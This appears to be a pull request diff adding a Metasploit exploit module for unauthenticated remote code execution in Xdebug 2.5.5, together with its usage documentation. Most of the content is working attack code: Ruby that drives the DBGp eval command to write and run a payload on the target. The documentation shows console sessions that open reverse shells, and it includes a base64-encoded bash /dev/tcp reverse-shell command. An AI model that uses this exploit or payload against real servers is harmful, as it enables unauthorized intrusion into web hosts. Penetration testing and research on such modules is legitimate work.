### PR TITLE
XDebug Unauthenticated OS command Execution

### DIFF
--- a/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
+++ b/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
@@ -12,7 +12,7 @@ List the steps needed to make sure this thing works
 -  Start `msfconsole`
 -  `use exploits/unix/http/xdebug_rce`
 -  `check`
--  `set RHOST 10.10.10.83` 
+-  `set RHOST 10.10.10.10
 -   `set LHOST 10.10.14.197`
 -   `exploit`
 
@@ -21,15 +21,15 @@ List the steps needed to make sure this thing works
 - Check
 
 ```msf > use exploits/unix/http/xdebug_rce
-msf exploit(unix/http/xdebug_rce) > set RHOST 10.10.10.83
-RHOST => 10.10.10.83
+msf exploit(unix/http/xdebug_rce) > set RHOST 10.10.10.10
+RHOST => 10.10.10.10
 msf exploit(unix/http/xdebug_rce) > set LHOST tun0
 LHOST => tun0
 msf exploit(unix/http/xdebug_rce) > check
 
-[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled
+[+] 10.10.10.10:80 - Looks like remote server has xdebug enabled
 
-[*] 10.10.10.83:80 The target service is running, but could not be validated.
+[*] 10.10.10.10:80 The target service is running, but could not be validated.
 msf exploit(unix/http/xdebug_rce) > ```
 
 
@@ -40,12 +40,12 @@ msf exploit(unix/http/xdebug_rce) > ```
 msf exploit(unix/http/xdebug_rce) > run
 
 [*] Started reverse TCP handler on 10.10.14.197:4444 
-[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled
+[+] 10.10.10.10:80 - Looks like remote server has xdebug enabled
 
 [*] 10.10.10.83:80 - Sending payload...... 
-[*] 10.10.10.83:80 - Waiting for client response.....
-[*] 10.10.10.83:80 - Received data.....
-[*] Command shell session 1 opened (10.10.14.197:4444 -> 10.10.10.83:36628) at 2018-04-23 20:45:41 +0530
+[*] 10.10.10.10:80 - Waiting for client response.....
+[*] 10.10.10.10:80 - Received data.....
+[*] Command shell session 1 opened (10.10.14.197:4444 -> 10.10.10.10:36628) at 2018-04-23 20:45:41 +0530
 
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
@@ -69,15 +69,15 @@ Content-Length: 314
 Content-Type: text/html; charset=UTF-8
 
 
-[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled
+[+] 10.10.10.10:80 - Looks like remote server has xdebug enabled
 
-[*] 10.10.10.83:80 - Sending payload...... 
+[*] 10.10.10.10:80 - Sending payload...... 
 Payload sent-eval -i 1 -- c3lzdGVtKCIgYmFzaCAtYyAnMDwmMTkyLTtleGVjIDE5Mjw+L2Rldi90Y3AvMTAuMTAuMTQuMTk3LzQ0NDQ7c2ggPCYxOTIgPiYxOTIgMj4mMTkyJyIp
-[*] 10.10.10.83:80 - Waiting for client response.....
-[*] 10.10.10.83:80 - Received data.....
+[*] 10.10.10.10:80 - Waiting for client response.....
+[*] 10.10.10.10:80 - Received data.....
 490<?xml version="1.0" encoding="iso-8859-1"?>
 <init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.1.12" protocol_version="1.0" appid="1179" idekey="jtGjvfApYD"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
-[*] Command shell session 2 opened (10.10.14.197:4444 -> 10.10.10.83:36676) at 2018-04-23 20:46:56 +0530
+[*] Command shell session 2 opened (10.10.14.197:4444 -> 10.10.10.10:36676) at 2018-04-23 20:46:56 +0530
 
 id
 

--- a/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
+++ b/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
@@ -1,0 +1,84 @@
+Xdebug is a PHP debugging tool that supports remote debugging of PHP code on the server via source code.
+This module exploits the RCE vulnerability and gives a command shell back.
+
+- Source: https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface
+
+- Documentation: https://xdebug.org/docs-dbgp.php
+
+- Tested on: Xdebug version 2.5.5
+
+List the steps needed to make sure this thing works
+
+-  Start `msfconsole`
+-  `use exploits/unix/http/xdebug_rce`
+-  `check`
+-  `set RHOST 10.10.10.83` 
+-   `set LHOST 10.10.14.197`
+-   `exploit`
+
+**Example Outputs**
+
+- Check
+
+```msf > use exploits/unix/http/xdebug_rce
+msf exploit(unix/http/xdebug_rce) > set RHOST 10.10.10.83
+RHOST => 10.10.10.83
+msf exploit(unix/http/xdebug_rce) > set LHOST tun0
+LHOST => tun0
+msf exploit(unix/http/xdebug_rce) > check
+
+[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled
+
+[*] 10.10.10.83:80 The target service is running, but could not be validated.
+msf exploit(unix/http/xdebug_rce) > ```
+
+
+
+- Run
+
+
+msf exploit(unix/http/xdebug_rce) > run
+
+[*] Started reverse TCP handler on 10.10.14.197:4444 
+[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled
+
+[*] 10.10.10.83:80 - Sending payload...... 
+[*] 10.10.10.83:80 - Waiting for client response.....
+[*] 10.10.10.83:80 - Received data.....
+[*] Command shell session 1 opened (10.10.14.197:4444 -> 10.10.10.83:36628) at 2018-04-23 20:45:41 +0530
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+- Run verbose output
+
+msf exploit(unix/http/xdebug_rce) > set verbose true
+verbose => true
+msf exploit(unix/http/xdebug_rce) > run
+
+[*] Started reverse TCP handler on 10.10.14.197:4444 
+Request send
+Date: Mon, 23 Apr 2018 15:16:56 GMT
+Server: Apache
+Vary: Accept-Encoding
+X-Content-Type-Options: nosniff
+X-Frame-Options: sameorigin
+X-XSS-Protection: 1; mode=block
+Xdebug: 2.5.5
+Content-Length: 314
+Content-Type: text/html; charset=UTF-8
+
+
+[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled
+
+[*] 10.10.10.83:80 - Sending payload...... 
+Payload sent-eval -i 1 -- c3lzdGVtKCIgYmFzaCAtYyAnMDwmMTkyLTtleGVjIDE5Mjw+L2Rldi90Y3AvMTAuMTAuMTQuMTk3LzQ0NDQ7c2ggPCYxOTIgPiYxOTIgMj4mMTkyJyIp
+[*] 10.10.10.83:80 - Waiting for client response.....
+[*] 10.10.10.83:80 - Received data.....
+490<?xml version="1.0" encoding="iso-8859-1"?>
+<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.1.12" protocol_version="1.0" appid="1179" idekey="jtGjvfApYD"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
+[*] Command shell session 2 opened (10.10.14.197:4444 -> 10.10.10.83:36676) at 2018-04-23 20:46:56 +0530
+
+id
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)```

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
 	super(update_info(info,
       'Name' => 'xdebug Unauthenticated OS Command Execution',
-      'DisclosureDate' => 'September 17 2017',
+      'DisclosureDate' => 'Sep 17 2017',
       'Description' => %q{
        'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.' 
       },

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::HttpClient
   include Rex::Proto::Http
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -28,12 +29,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ['URL', 'https://paper.seebug.org/397/']
       ],
       'License' => MSF_LICENSE,
-      'Platform' => 'unix',
-      'Arch' => [ARCH_CMD],
+      'Platform' => 'php',
+      'Arch' => [ARCH_PHP],
       'DefaultTarget' => 0,
       'Stance' => Msf::Exploit::Stance::Aggressive,
       'DefaultOptions' => {
-        'PAYLOAD' => 'cmd/unix/reverse_bash'
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
       },
       'Payload' => {
         'DisableNops' => true,
@@ -45,7 +46,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
         OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
         OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
-        Opt::RPORT(80)
+        Opt::RPORT(80),
+        OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
     ])
   end
 
@@ -54,17 +56,13 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi({
         'uri' => datastore["PATH"],
         'method' => 'GET',
-        'vars_get' => {
+	'vars_get' => {
           'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
-        }
+	}
       })
       vprint_status "Request sent\n#{res.headers}"
-      unless res
-        vprint_error 'Connection failed'
-        return CheckCode::Unknown
-      end
       if res && res.headers.to_s =~ /XDEBUG/i
-        vprint_good("Looks like remote server has xdebug enabled\n")
+        print_good("Looks like remote server has xdebug enabled\n")
         return CheckCode::Detected
       else
         return CheckCode::Safe
@@ -75,9 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    cmd = "eval -i 1 -- " + Rex::Text.encode_base64("system(\" bash -c \'#{payload.encoded}\'\")") + "\x00"
+    payl=Rex::Text.encode_base64("#{payload.encoded}")
+    file="#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
+    puts file
+    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\"php #{file} && rm #{file}\")") + "\x00"
     webserver = Thread.new do
-    begin
+    begin	    
       server = Rex::Socket::TcpServer.create(
         'LocalPort' => datastore['SRVPORT'],
         'LocalHost' => datastore['SRVHOST'],
@@ -91,9 +92,10 @@ class MetasploitModule < Msf::Exploit::Remote
       data = client.recv(1024)
       print_status("Receiving response")
       vprint_line(data)
-      print_status("Command shell might take upto a minute to respond.Please be patient.")
-      print_status("Sending payload of size #{cmd.length} bytes")
-      client.write(cmd)
+      print_status("Shell might take upto a minute to respond.Please be patient.")
+      print_status("Sending payload of size #{cmd1.length} bytes")
+      register_file_for_cleanup(file)
+      client.write(cmd1)
       client.close
       server.close
       webserver.exit
@@ -101,7 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
       webserver.exit
     end
     end
-
     send_request_cgi({
         'uri' => datastore['PATH'],
         'method' => 'GET',

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     file="#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
     cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\"php #{file} && rm #{file}\")") + "\x00"
     webserver = Thread.new do
-    begin	
+    begin
       server = Rex::Socket::TcpServer.create(
         'LocalPort' => datastore['SRVPORT'],
         'LocalHost' => datastore['SRVHOST'],

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -45,8 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
         OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
         OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
-        OptAddress.new('RHOST', [true, "Target address"]),
-        OptInt.new('RPORT', [true, "Target port", 80])
+        Opt::RPORT(80)
     ])
   end
 
@@ -60,14 +59,19 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       })
       vprint_status "Request sent\n#{res.headers}"
+      unless res
+        vprint_error 'Connection failed'
+        return CheckCode::Unknown
+      end
+      
       if res && res.headers.to_s =~ /XDEBUG/i
-        print_good("Looks like remote server has xdebug enabled\n")
-        return Exploit::CheckCode::Detected
+        vprint_good("Looks like remote server has xdebug enabled\n")
+        return CheckCode::Detected
       else
-        return Exploit::CheckCode::Safe
+        return CheckCode::Safe
       end
       rescue Rex::ConnectionError
-        return Exploit::CheckCode::Unknown
+        return CheckCode::Unknown
     end
   end
 

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi({
         'uri' => datastore["PATH"],
         'method' => 'GET',
-	'vars_get' => {
+          'vars_get' => {
           'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
-	}
+       }
       })
       vprint_status "Request sent\n#{res.headers}"
       if res && res.headers.to_s =~ /XDEBUG/i
@@ -75,10 +75,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     payl=Rex::Text.encode_base64("#{payload.encoded}")
     file="#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
-    puts file
     cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\"php #{file} && rm #{file}\")") + "\x00"
     webserver = Thread.new do
-    begin	    
+    begin	
       server = Rex::Socket::TcpServer.create(
         'LocalPort' => datastore['SRVPORT'],
         'LocalHost' => datastore['SRVHOST'],

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -54,11 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       res = send_request_cgi({
         'uri' => datastore["PATH"],
-        'method' => 'GET'
+        'method' => 'GET',
+	'vars_get' => {
+          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+	}
       })
-
-      vprint_line "Request send\n#{res.headers}"
-      if res && res.headers["Xdebug"]
+      vprint_status "Request sent\n#{res.headers}"
+      if res && res.headers.to_s =~ /XDEBUG/i
         print_good("Looks like remote server has xdebug enabled\n")
         return Exploit::CheckCode::Detected
       else
@@ -71,8 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     cmd = "eval -i 1 -- " + Rex::Text.encode_base64("system(\" bash -c \'#{payload.encoded}\'\")") + "\x00"
-    print_status("Sending payload of size #{cmd.length} bytes")
     webserver = Thread.new do
+    begin
       server = Rex::Socket::TcpServer.create(
         'LocalPort' => datastore['SRVPORT'],
         'LocalHost' => datastore['SRVHOST'],
@@ -86,12 +88,15 @@ class MetasploitModule < Msf::Exploit::Remote
       data = client.recv(1024)
       print_status("Receiving response")
       vprint_line(data)
+      print_status("Command shell might take upto a minute to respond.Please be patient.")
+      print_status("Sending payload of size #{cmd.length} bytes")
       client.write(cmd)
       client.close
       server.close
       webserver.exit
     ensure
       webserver.exit
+    end
     end
 
     send_request_cgi({

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -55,9 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi({
         'uri' => datastore["PATH"],
         'method' => 'GET',
-	'vars_get' => {
+        'vars_get' => {
           'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
-	}
+        }
       })
       vprint_status "Request sent\n#{res.headers}"
       if res && res.headers.to_s =~ /XDEBUG/i

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -1,4 +1,3 @@
-##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
@@ -9,20 +8,20 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Rex::Proto::Http
   def initialize(info = {})
-	super(update_info(info,
+super(update_info(info,
       'Name' => 'xdebug Unauthenticated OS Command Execution',
-      'DisclosureDate' => 'Sep 17 2017',
       'Description' => %q{
-       'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.' 
+       'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.'
       },
+      'DisclosureDate' => 'Sep 17 2017',
       'Author' => [
-	'Ricter Zheng', #Discovery https://twitter.com/RicterZ     
+'Ricter Zheng', #Discovery https://twitter.com/RicterZ
         'Shaksham Jaiswal', #MinatoTW
-	'Mumbai' #Austin Hudson
+'Mumbai' #Austin Hudson
       ],
       'References' => [
         ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
-	['URL', 'https://paper.seebug.org/397/']
+['URL', 'https://paper.seebug.org/397/']
       ],
       'License' => MSF_LICENSE,
       'Platform' => 'unix',
@@ -42,9 +41,9 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
         OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
-	OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
-	OptAddress.new('RHOST', [true, "Target address"]),
-	OptInt.new('RPORT', [true, "Target port", 80])  
+OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
+OptAddress.new('RHOST', [true, "Target address"]),
+OptInt.new('RPORT', [true, "Target port", 80])
       ]
     )
   end
@@ -52,13 +51,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     begin
       res = send_request_cgi({
-	'uri' => datastore["PATH"],
+'uri' => datastore["PATH"],
         'method' => 'GET'
       })
 
       vprint_line "Request send\n#{res.headers}"
       if res && res.headers["Xdebug"]
-	print_good("Looks like remote server has xdebug enabled\n")
+print_good("Looks like remote server has xdebug enabled\n")
         return Exploit::CheckCode::Detected
       else
         return Exploit::CheckCode::Safe
@@ -70,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
    begin
-    check	   
+    check
     srvhost = datastore["SRVHOST"]
     srvport = datastore["SRVPORT"]
     rhost = datastore["RHOST"]
@@ -82,36 +81,37 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_line("Payload sent-#{cmd}")
     webserv=Thread.new do
     server=Rex::Socket::TcpServer.create(
-		    'LocalPort' => srvport,
-		    'LocalHost' => srvhost,
-		    'Context'   =>
-		           {
-			       'Msf'        => framework,
-			       'MsfExploit' => self
-			   }
-	    )
-    	client=server.accept 
-	print_status("Waiting for client response.....")
-	data=client.recv(1024)
-	print_status("Received data.....")
-    	vprint_line(data)
-	client.write(cmd)
-    	client.close
-	server.close
-	webserv.exit
+    'LocalPort' => srvport,
+    'LocalHost' => srvhost,
+    'Context'   =>
+           {
+       'Msf'        => framework,
+       'MsfExploit' => self
+   }
+    )
+    client=server.accept
+print_status("Waiting for client response.....")
+data=client.recv(1024)
+print_status("Received data.....")
+    vprint_line(data)
+client.write(cmd)
+    client.close
+server.close
+webserv.exit
     ensure
-        webserv.exit	    
+        webserv.exit
     end
     res=send_request_cgi({
-	    'uri' => datastore["PATH"],
-	    'method' => 'GET',
-	    'headers' => {
-		    'X-Forwarded-For' => "#{lhost}" 
-	    },
-	    'vars_get' => {
-		    'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
-	    }
+    'uri' => datastore["PATH"],
+    'method' => 'GET',
+    'headers' => {
+    'X-Forwarded-For' => "#{lhost}"
+    },
+    'vars_get' => {
+    'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+    }
     })
 end
   end
-end  
+end
+

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
       })
       vprint_status "Request sent\n#{res.headers}"
       if res && res.headers.to_s =~ /XDEBUG/i
-        print_good("Looks like remote server has xdebug enabled\n")
+        vprint_good("Looks like remote server has xdebug enabled\n")
         return CheckCode::Detected
       else
         return CheckCode::Safe
@@ -73,9 +73,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    payl=Rex::Text.encode_base64("#{payload.encoded}")
-    file="#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
-    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\"php #{file} && rm #{file}\")") + "\x00"
+    payl = Rex::Text.encode_base64("#{payload.encoded}")
+    file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
+    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
     webserver = Thread.new do
     begin
       server = Rex::Socket::TcpServer.create(

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
       })
 
       client = server.accept
-      print_status("Awating for client response.")
+      print_status("Waiting for client response.")
       data = client.recv(1024)
       print_status("Receiving response")
       vprint_line(data)
@@ -106,10 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => datastore['PATH'],
         'method' => 'GET',
         'headers' => {
-          'X-Forwarded-For' => "#{lhost}"
-        },
-        'vars_get' => {
-          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+          'X-Forwarded-For' => "#{lhost}",
+          'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
         }
     })
   end

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
 	super(update_info(info,
       'Name' => 'xdebug Unauthenticated OS Command Execution',
-      'DisclosureDate' => ' 2017-09-17 ',
+      'DisclosureDate' => 'September 17 2017',
       'Description' => %q{
        'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.' 
       },

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -1,27 +1,31 @@
+##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
+
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::HttpClient
   include Rex::Proto::Http
+
   def initialize(info = {})
-super(update_info(info,
+    super(update_info(info,
       'Name' => 'xdebug Unauthenticated OS Command Execution',
       'Description' => %q{
-       'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.'
+       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
+       This allows the attacker to execute arbitrary php code as the context of the web user.
       },
       'DisclosureDate' => 'Sep 17 2017',
       'Author' => [
-'Ricter Zheng', #Discovery https://twitter.com/RicterZ
-        'Shaksham Jaiswal', #MinatoTW
-'Mumbai' #Austin Hudson
+        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
+        'Shaksham Jaiswal', # MinatoTW
+        'Mumbai' # Austin Hudson
       ],
       'References' => [
         ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
-['URL', 'https://paper.seebug.org/397/']
+        ['URL', 'https://paper.seebug.org/397/']
       ],
       'License' => MSF_LICENSE,
       'Platform' => 'unix',
@@ -37,81 +41,68 @@ super(update_info(info,
       'Targets' => [[ 'Automatic', {} ]],
     ))
 
-    register_options(
-      [
+    register_options([
         OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
         OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
-OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
-OptAddress.new('RHOST', [true, "Target address"]),
-OptInt.new('RPORT', [true, "Target port", 80])
-      ]
-    )
+        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
+        OptAddress.new('RHOST', [true, "Target address"]),
+        OptInt.new('RPORT', [true, "Target port", 80])
+    ])
   end
 
   def check
     begin
       res = send_request_cgi({
-'uri' => datastore["PATH"],
+        'uri' => datastore["PATH"],
         'method' => 'GET'
       })
 
       vprint_line "Request send\n#{res.headers}"
       if res && res.headers["Xdebug"]
-print_good("Looks like remote server has xdebug enabled\n")
+        print_good("Looks like remote server has xdebug enabled\n")
         return Exploit::CheckCode::Detected
       else
         return Exploit::CheckCode::Safe
       end
       rescue Rex::ConnectionError
-      return Exploit::CheckCode::Unknown
+        return Exploit::CheckCode::Unknown
     end
   end
 
   def exploit
-   begin
-    check
-    srvhost = datastore["SRVHOST"]
-    srvport = datastore["SRVPORT"]
-    rhost = datastore["RHOST"]
-    rport = datastore["RPORT"]
-    lhost = datastore["LHOST"]
-    uri = datastore["PATH"]
-    cmd= "eval -i 1 -- "+ Rex::Text.encode_base64("system(\" bash -c \'#{payload.encoded}\'\")")+"\x00"
-    print_status("Sending payload...... ")
-    vprint_line("Payload sent-#{cmd}")
-    webserv=Thread.new do
-    server=Rex::Socket::TcpServer.create(
-    'LocalPort' => srvport,
-    'LocalHost' => srvhost,
-    'Context'   =>
-           {
-       'Msf'        => framework,
-       'MsfExploit' => self
-   }
-    )
-    client=server.accept
-print_status("Waiting for client response.....")
-data=client.recv(1024)
-print_status("Received data.....")
-    vprint_line(data)
-client.write(cmd)
-    client.close
-server.close
-webserv.exit
+    cmd = "eval -i 1 -- " + Rex::Text.encode_base64("system(\" bash -c \'#{payload.encoded}\'\")") + "\x00"
+    print_status("Sending payload of size #{cmd.length} bytes")
+    webserver = Thread.new do
+      server = Rex::Socket::TcpServer.create(
+        'LocalPort' => datastore['SRVPORT'],
+        'LocalHost' => datastore['SRVHOST'],
+        'Context' => {
+          'Msf' => framework,
+          'MsfExploit' => self
+      })
+
+      client = server.accept
+      print_status("Awating for client response.")
+      data = client.recv(1024)
+      print_status("Receiving response")
+      vprint_line(data)
+      client.write(cmd)
+      client.close
+      server.close
+      webserver.exit
     ensure
-        webserv.exit
+      webserver.exit
     end
-    res=send_request_cgi({
-    'uri' => datastore["PATH"],
-    'method' => 'GET',
-    'headers' => {
-    'X-Forwarded-For' => "#{lhost}"
-    },
-    'vars_get' => {
-    'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
-    }
+
+    send_request_cgi({
+        'uri' => datastore['PATH'],
+        'method' => 'GET',
+        'headers' => {
+          'X-Forwarded-For' => "#{lhost}"
+        },
+        'vars_get' => {
+          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+        }
     })
-end
   end
 end
-

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -1,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http
+  def initialize(info = {})
+	super(update_info(info,
+      'Name' => 'xdebug Unauthenticated OS Command Execution',
+      'DisclosureDate' => ' 2017-09-17 ',
+      'Description' => %q{
+       'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.' 
+      },
+      'Author' => [
+	'Ricter Zheng', #Discovery https://twitter.com/RicterZ     
+        'Shaksham Jaiswal', #MinatoTW
+	'Mumbai' #Austin Hudson
+      ],
+      'References' => [
+        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
+	['URL', 'https://paper.seebug.org/397/']
+      ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => [ARCH_CMD],
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'cmd/unix/reverse_bash'
+      },
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options(
+      [
+        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
+        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
+	OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
+	OptAddress.new('RHOST', [true, "Target address"]),
+	OptInt.new('RPORT', [true, "Target port", 80])  
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+	'uri' => datastore["PATH"],
+        'method' => 'GET'
+      })
+
+      vprint_line "Request send\n#{res.headers}"
+      if res && res.headers["Xdebug"]
+	print_good("Looks like remote server has xdebug enabled\n")
+        return Exploit::CheckCode::Detected
+      else
+        return Exploit::CheckCode::Safe
+      end
+      rescue Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+   begin
+    check	   
+    srvhost = datastore["SRVHOST"]
+    srvport = datastore["SRVPORT"]
